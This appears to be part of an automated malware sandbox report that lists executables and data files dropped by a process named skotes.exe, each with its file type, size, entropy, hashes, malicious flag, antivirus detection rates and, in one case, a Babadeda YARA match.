                                                                                                                                                                                                                                                    Entropy (8bit):6.068687396136205
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:4U77L3RZgH96z4S/zCtTFL/LcfQnolkbe7yFH3HtDg8VG:4U77L3RZo6/EFPQQny77I3N3VG
                                                                                                                                                                                                                                                    MD5:19861D67B2811D6EB3BE1951B28703AE
                                                                                                                                                                                                                                                    SHA1:FCE3CDCFC4067AF2451D638E99BB1EDE113C29B8
                                                                                                                                                                                                                                                    SHA-256:7B8526752F7A9580FC6EE88C35C8DF39EF69BA1AB4241BBA1FAD1FB44C80A7A5
                                                                                                                                                                                                                                                    SHA-512:D13EAC3F7E498217973DC153645FBEFDE3D281B8BE0B4EEC8B1C757948581A5BFA6E4EDF67A73B25AA2AC59895E20A8E94C4573BCAB92244A149405927230890
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                    Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..d....}.O..........#............................@.............................0......Bt.......................................................S...........V.............. 3...........................................................................................text...0........................... ..`.rdata...Z.......\..................@..@.data....0...p.......R..............@....pdata...............^..............@..@.rsrc....V.......X...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):970240
                                                                                                                                                                                                                                                    Entropy (8bit):6.702569330753143
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:eqDEvCTbMWu7rQYlBQcBiT6rprG8adIP3IFp:eTvC/MTQYxsWR7adSI
                                                                                                                                                                                                                                                    MD5:C34E7E019F5FBA5A6CC436D30D6F4AB6
                                                                                                                                                                                                                                                    SHA1:57201B21A26DDA8C669D28183755E419CFBEBFD9
                                                                                                                                                                                                                                                    SHA-256:0DCFDA443E614863A5721C4C6D91A8D722C8C309FDA0500EBEFF7A1C55CAFCB8
                                                                                                                                                                                                                                                    SHA-512:84756FC56C44BFC91D6319AFCAE94C87A2ADD44B20DA68C171FA9F8845CDBF79B3A38EA6BEF8FE1720A365A03875C59EA73F352532695B6BB93AB8C96EA4458E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2013088
                                                                                                                                                                                                                                                    Entropy (8bit):6.068687396136205
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:4U77L3RZgH96z4S/zCtTFL/LcfQnolkbe7yFH3HtDg8VG:4U77L3RZo6/EFPQQny77I3N3VG
                                                                                                                                                                                                                                                    MD5:19861D67B2811D6EB3BE1951B28703AE
                                                                                                                                                                                                                                                    SHA1:FCE3CDCFC4067AF2451D638E99BB1EDE113C29B8
                                                                                                                                                                                                                                                    SHA-256:7B8526752F7A9580FC6EE88C35C8DF39EF69BA1AB4241BBA1FAD1FB44C80A7A5
                                                                                                                                                                                                                                                    SHA-512:D13EAC3F7E498217973DC153645FBEFDE3D281B8BE0B4EEC8B1C757948581A5BFA6E4EDF67A73B25AA2AC59895E20A8E94C4573BCAB92244A149405927230890
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1787
                                                                                                                                                                                                                                                    Entropy (8bit):5.38309972100953
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:SfNaoQyyDyMTEQyXfNaoQwQQfNaoQFQqfNaoQ5a0UrU0U8Q5w:6NnQyCJTEQyPNnQwQcNnQFQyNnQo0Ur1
                                                                                                                                                                                                                                                    MD5:72EE1144C5030EF95B05C74DE75400E1
                                                                                                                                                                                                                                                    SHA1:0A2638FB9344DFE4B047501F63EC078857CAD171
                                                                                                                                                                                                                                                    SHA-256:DE842C59A0E6B5A490AFF3589B14D818FF38D314046B7D381CCE5D6F3A4C83AE
                                                                                                                                                                                                                                                    SHA-512:FCEB6BC2DD78B3AB2897D2490C57E258E9DAC676823EC7673176F9E2161C41EBEA861ECED4D0684343F0471C875156EAAD5010B16DB3F760A2D115DD768D781E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/532FB8D70DC2F37B3D4AD8DCDC0CBA07",.. "id": "532FB8D70DC2F37B3D4AD8DCDC0CBA07",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/532FB8D70DC2F37B3D4AD8DCDC0CBA07"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/7E4ABE7B284CCC95A29FAF7E26159704",.. "id": "7E4ABE7B284CCC95A29FAF7E26159704",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/7E4ABE7B284CCC95A29FAF7E26159704"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):540672
                                                                                                                                                                                                                                                    Entropy (8bit):7.614709628313703
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:huB9du8NOZx84E5YoShCwrp1OkwWFewdYHMUzN4r52ki:i9du88Zx8VAwBkewVUckki
                                                                                                                                                                                                                                                    MD5:9AB250B0DC1D156E2D123D277EB4D132
                                                                                                                                                                                                                                                    SHA1:3B434FF78208C10F570DFE686455FD3094F3DD48
                                                                                                                                                                                                                                                    SHA-256:49BFA0B1C3553208E59B6B881A58C94BB4AA3D09E51C3F510F207B7B24675864
                                                                                                                                                                                                                                                    SHA-512:A30FB204B556B0DECD7FAB56A44E62356C7102BC8146B2DFD88E6545DEA7574E043A3254035B7514EE0C686A726B8F5BA99BCD91E8C2C7F39C105E2724080EF0
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):50265898
                                                                                                                                                                                                                                                    Entropy (8bit):7.999674698414995
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:786432:iVfnIqg/4eDeagYxzk6IdjqnDlK4Z6cZKXV1PGQYAka8UGBBFi17KhVX2lfw0PaU:iVTg/44gYxzPIxeDlEcZeVMa8U6Bhxm1
                                                                                                                                                                                                                                                    MD5:26F7294CA7A10C65B44057525A233636
                                                                                                                                                                                                                                                    SHA1:59A5C0438745C24350DFF1D05726D85B2F5DB394
                                                                                                                                                                                                                                                    SHA-256:57598406512555F6B7EC169D6627E77C8581795844CF26D3F61A3E9FB777F36A
                                                                                                                                                                                                                                                    SHA-512:C73B7161A925D8438F8B31D7E04FB3FEC4DBFCD2A22B52C9C0CC3DA77B6DA3417351C076A28D601D06346B947042EF1715865CA358CB20BBFC7EFCFF9332E440
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5206016
                                                                                                                                                                                                                                                    Entropy (8bit):5.564218011157211
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:/5dL6ZDdy3R5it8PYXdjmJU7VVZr4JIMappEGc:/bgDdy3REt8PYXdyJqVVZEJIzH
                                                                                                                                                                                                                                                    MD5:3F6AB8A7E543EE65455B7D923402EF58
                                                                                                                                                                                                                                                    SHA1:192AA1F86EEB4B39E057A49FB9A2EE7AF94D1669
                                                                                                                                                                                                                                                    SHA-256:07C9218CCBA3CEE93DEDDB69C6AFCCD55AE878B07594BB00343D9C3331EB95D7
                                                                                                                                                                                                                                                    SHA-512:4B8E3B19CD5D238959B19E8AD4618C6FE113058A059281CDA238E20E544DEFA93DC11EAAE5829937E6BD6E4DF19EC97EAF22DFB9AEEA3955986E26A7381040D0
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4444672
                                                                                                                                                                                                                                                    Entropy (8bit):7.9821429531468775
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:98304:LzjLmEIEtVZ3IDyI1OSfYsXfHhQpNSNdx3UZgzIxdP8hyy4i:LzvmEI2fIBOSzXfBQpNS/x3U6IxdPo
                                                                                                                                                                                                                                                    MD5:53DB8912E908083FA5076160A0DB3C31
                                                                                                                                                                                                                                                    SHA1:FF4309A7EC13CF183B4B13D83CDEE8554CC8310E
                                                                                                                                                                                                                                                    SHA-256:8776714B524B22667FCE6F8D4CFAE8BF99061E2A3A4516E48B8335E7B2E65971
                                                                                                                                                                                                                                                    SHA-512:529FCCCB4747DAF4FEF3C3FA0A2E661EF454129E9F3E922EE6BA158F99CAE0534DB7C8AB62A0CE7AF57EDD13A2F83E9BD7FA60E88BFF698BFDB4630F4F679F09
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):14481947
                                                                                                                                                                                                                                                    Entropy (8bit):7.992326276772699
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:393216:ehKRAo/FNXMCHWUj2cuIn/PT1fXMsyVY6ZC6o:ehMNXMb8LX/r107C6o
                                                                                                                                                                                                                                                    MD5:9A3C4CC8695621F95D249B6AE3ABD704
                                                                                                                                                                                                                                                    SHA1:6AD2D319A21D3A414FA5FC2575720957858AE450
                                                                                                                                                                                                                                                    SHA-256:9C476374BB0D6FD0D38B7258A38B449FA6E6D38E119F4A1AD1A55A0B88C1452B
                                                                                                                                                                                                                                                    SHA-512:1A5B443469B5B1463BFECB07C98DF9326DBB87019303ACB1E0318C3CEF59078FDCA5DF86AF0B4CCBA07346DE23F6FE23AA00D6F5218D9E9B36D94414E56617E9
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):15360
                                                                                                                                                                                                                                                    Entropy (8bit):5.03888709426846
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:8dGRmTbW+eO9GXSrtx2MUyQ6JCgf61FDOVV:QzGXaff61FDO7
                                                                                                                                                                                                                                                    MD5:9BE5AC720DCF1838FD5A2D7352672F66
                                                                                                                                                                                                                                                    SHA1:D8046191A1D1756768A8BAD62CE3BA757DEB7D53
                                                                                                                                                                                                                                                    SHA-256:CC5EB5AC7CB599572A1C9747EFA83774221E0AD4A24ED6545D5BC03A44A23196
                                                                                                                                                                                                                                                    SHA-512:72F618868C9960332931D7055A4BFF5B3394979A1F5D8089D51C6DC436A121A3D9332D405A3EB3F65FCB8C5930C73606E194782FCF29B46D5E42235DE29ACC33
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2668544
                                                                                                                                                                                                                                                    Entropy (8bit):6.1024828899386625
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:CAT1rDm9Jeg99E2spwr44UaaDB8v+oyLfwt3LE3eFqZHNZ25WYDo6fsWc6jlOaSo:CATNI9G2sOr44UaaDB8moVt3LE3eFqZw
                                                                                                                                                                                                                                                    MD5:87330F1877C33A5A6203C49075223B16
                                                                                                                                                                                                                                                    SHA1:55B64EE8B2D1302581AB1978E9588191E4E62F81
                                                                                                                                                                                                                                                    SHA-256:98F2344ED45FF0464769E5B006BF0E831DC3834F0534A23339BB703E50DB17E0
                                                                                                                                                                                                                                                    SHA-512:7C747D3EDB04E4E71DCE7EFA33F5944A191896574FEE5227316739A83D423936A523DF12F925EE9B460CCE23B49271F549C1EE5D77B50A7D7C6E3F31BA120C8F
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 48%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1863680
                                                                                                                                                                                                                                                    Entropy (8bit):7.949142262177312
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:gRIAhjQItBKmb5Owb96N2rGibzxc3mL0:81Q4B/Rddc2L
                                                                                                                                                                                                                                                    MD5:ED67D9C1767292DA69180DB0D5B7E57F
                                                                                                                                                                                                                                                    SHA1:3C6BC67972D2237F59DE3DB6D08E5F1A8D6ADA11
                                                                                                                                                                                                                                                    SHA-256:00E76F1C02024D46C81A2E9D85BDFDAD9B4819BD86AD227B28AD4498A0D8894A
                                                                                                                                                                                                                                                    SHA-512:5498DA32D2E4EA25FE1AB7D539CF6C61A5FCB92B1375221E784EA3567F89088C9A411C775C91421D294FA17B82CD1EF33153EC22896E93340DC39005803EE4C6
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2830336
                                                                                                                                                                                                                                                    Entropy (8bit):6.521597081163968
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:WdHKsByBmtI0YOKm5tfumYtgRD7rqa0jL5SSO:yHKsByBmtYJm5tWYRqa0v
                                                                                                                                                                                                                                                    MD5:E3C009D85559B2092B469497794436C5
                                                                                                                                                                                                                                                    SHA1:A08AC17D1AE7A588480EF28792C84476883BEB00
                                                                                                                                                                                                                                                    SHA-256:7C34C45A564A1B1DFFA5ECBF770EF1FE23D64B6B895E137906E176B82D3BBB1C
                                                                                                                                                                                                                                                    SHA-512:0D3627019491DC9A6A4078C1748A2AE36245C6E3EEDB9ED95616F87C590972583C6351BFE694B84BABE062FD61A5AE6A7531780BDF7537E73B01A44FB2268EAF
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):513024
                                                                                                                                                                                                                                                    Entropy (8bit):7.65739215558306
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:YH4SldRxAWdkpOQ7CLt9iLS1gYEtAarDRjAMmq:YHxldtkoO2gLeMD9A7q
                                                                                                                                                                                                                                                    MD5:6CF2696DDD277CBFEF6B751CB7F3C65E
                                                                                                                                                                                                                                                    SHA1:850FFCD24EEF0740A111B5AF726C520C5A9780BF
                                                                                                                                                                                                                                                    SHA-256:14BA68337F0E1F65D4D65D23E67AEAF41C86874B67B17BEB5C89E78441B69A1E
                                                                                                                                                                                                                                                    SHA-512:42CC20052068FA95A2D450DEF956F9DDBC3454F6EF45956364AC483D011B72B6A481AD343453B84F87D336879162A56FA8EF6A6642C5F93D652EE6CE894CC351
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):93696
                                                                                                                                                                                                                                                    Entropy (8bit):6.742682621521483
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:n7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfEwb3BOp:77DhdC6kzWypvaQ0FxyNTBfEB
                                                                                                                                                                                                                                                    MD5:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    SHA1:F19B8F64D6B6538F9E91F0DD5B67EDD39225B811
                                                                                                                                                                                                                                                    SHA-256:35EA0526EF247A229B7A5FFA6D23928FD25C4BCAAC41A34D7C735CC2A8746822
                                                                                                                                                                                                                                                    SHA-512:3E3BE988610BE6A6874176145969AD7C0C9E7935774803A62E594BFA4C96B2BAD795E3C77EA6958AA5E38F5B5545CF9629E74D909AA5E00FCA7F78A2013F68EC
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe, Author: Joe Security
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 57%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):15360
                                                                                                                                                                                                                                                    Entropy (8bit):5.03888709426846
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:8dGRmTbW+eO9GXSrtx2MUyQ6JCgf61FDOVV:QzGXaff61FDO7
                                                                                                                                                                                                                                                    MD5:9BE5AC720DCF1838FD5A2D7352672F66
                                                                                                                                                                                                                                                    SHA1:D8046191A1D1756768A8BAD62CE3BA757DEB7D53
                                                                                                                                                                                                                                                    SHA-256:CC5EB5AC7CB599572A1C9747EFA83774221E0AD4A24ED6545D5BC03A44A23196
                                                                                                                                                                                                                                                    SHA-512:72F618868C9960332931D7055A4BFF5B3394979A1F5D8089D51C6DC436A121A3D9332D405A3EB3F65FCB8C5930C73606E194782FCF29B46D5E42235DE29ACC33
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):540672
                                                                                                                                                                                                                                                    Entropy (8bit):7.614709628313703
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:huB9du8NOZx84E5YoShCwrp1OkwWFewdYHMUzN4r52ki:i9du88Zx8VAwBkewVUckki
                                                                                                                                                                                                                                                    MD5:9AB250B0DC1D156E2D123D277EB4D132
                                                                                                                                                                                                                                                    SHA1:3B434FF78208C10F570DFE686455FD3094F3DD48
                                                                                                                                                                                                                                                    SHA-256:49BFA0B1C3553208E59B6B881A58C94BB4AA3D09E51C3F510F207B7B24675864
                                                                                                                                                                                                                                                    SHA-512:A30FB204B556B0DECD7FAB56A44E62356C7102BC8146B2DFD88E6545DEA7574E043A3254035B7514EE0C686A726B8F5BA99BCD91E8C2C7F39C105E2724080EF0
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2668544
                                                                                                                                                                                                                                                    Entropy (8bit):6.1024828899386625
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:CAT1rDm9Jeg99E2spwr44UaaDB8v+oyLfwt3LE3eFqZHNZ25WYDo6fsWc6jlOaSo:CATNI9G2sOr44UaaDB8moVt3LE3eFqZw
                                                                                                                                                                                                                                                    MD5:87330F1877C33A5A6203C49075223B16
                                                                                                                                                                                                                                                    SHA1:55B64EE8B2D1302581AB1978E9588191E4E62F81
                                                                                                                                                                                                                                                    SHA-256:98F2344ED45FF0464769E5B006BF0E831DC3834F0534A23339BB703E50DB17E0
                                                                                                                                                                                                                                                    SHA-512:7C747D3EDB04E4E71DCE7EFA33F5944A191896574FEE5227316739A83D423936A523DF12F925EE9B460CCE23B49271F549C1EE5D77B50A7D7C6E3F31BA120C8F
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 48%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):50265898
                                                                                                                                                                                                                                                    Entropy (8bit):7.999674698414995
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:786432:iVfnIqg/4eDeagYxzk6IdjqnDlK4Z6cZKXV1PGQYAka8UGBBFi17KhVX2lfw0PaU:iVTg/44gYxzPIxeDlEcZeVMa8U6Bhxm1
                                                                                                                                                                                                                                                    MD5:26F7294CA7A10C65B44057525A233636
                                                                                                                                                                                                                                                    SHA1:59A5C0438745C24350DFF1D05726D85B2F5DB394
                                                                                                                                                                                                                                                    SHA-256:57598406512555F6B7EC169D6627E77C8581795844CF26D3F61A3E9FB777F36A
                                                                                                                                                                                                                                                    SHA-512:C73B7161A925D8438F8B31D7E04FB3FEC4DBFCD2A22B52C9C0CC3DA77B6DA3417351C076A28D601D06346B947042EF1715865CA358CB20BBFC7EFCFF9332E440
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2013088
                                                                                                                                                                                                                                                    Entropy (8bit):6.068687396136205
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:4U77L3RZgH96z4S/zCtTFL/LcfQnolkbe7yFH3HtDg8VG:4U77L3RZo6/EFPQQny77I3N3VG
                                                                                                                                                                                                                                                    MD5:19861D67B2811D6EB3BE1951B28703AE
                                                                                                                                                                                                                                                    SHA1:FCE3CDCFC4067AF2451D638E99BB1EDE113C29B8
                                                                                                                                                                                                                                                    SHA-256:7B8526752F7A9580FC6EE88C35C8DF39EF69BA1AB4241BBA1FAD1FB44C80A7A5
                                                                                                                                                                                                                                                    SHA-512:D13EAC3F7E498217973DC153645FBEFDE3D281B8BE0B4EEC8B1C757948581A5BFA6E4EDF67A73B25AA2AC59895E20A8E94C4573BCAB92244A149405927230890
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1867776
                                                                                                                                                                                                                                                    Entropy (8bit):7.947273900269305
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:kQnNyLAbzstcL5o5Kf5lvmFcomUMSTiHP8TEAUH:kGIKsY5osf5cFTM2ivNN
                                                                                                                                                                                                                                                    MD5:FB92C370E7874CF246D292C2C6B36153
                                                                                                                                                                                                                                                    SHA1:24941C27AC2C9A6A227BA5C4D2E3EDB6864CBEAD
                                                                                                                                                                                                                                                    SHA-256:4B8097A621F5BCD06CE04E4370EA51339CFD282DD8265A9F825FA3ED619D1951
                                                                                                                                                                                                                                                    SHA-512:85CC7F786A0E0BD3A671EB35B2ABE06414F6707696213D512B29D03845CE05A20CE3E5628E8119C9FFEE06CD7FB76FF74E55824CE1F8E1EED2A5E6FE752E3C19
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1863680
                                                                                                                                                                                                                                                    Entropy (8bit):7.949142262177312
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:gRIAhjQItBKmb5Owb96N2rGibzxc3mL0:81Q4B/Rddc2L
                                                                                                                                                                                                                                                    MD5:ED67D9C1767292DA69180DB0D5B7E57F
                                                                                                                                                                                                                                                    SHA1:3C6BC67972D2237F59DE3DB6D08E5F1A8D6ADA11
                                                                                                                                                                                                                                                    SHA-256:00E76F1C02024D46C81A2E9D85BDFDAD9B4819BD86AD227B28AD4498A0D8894A
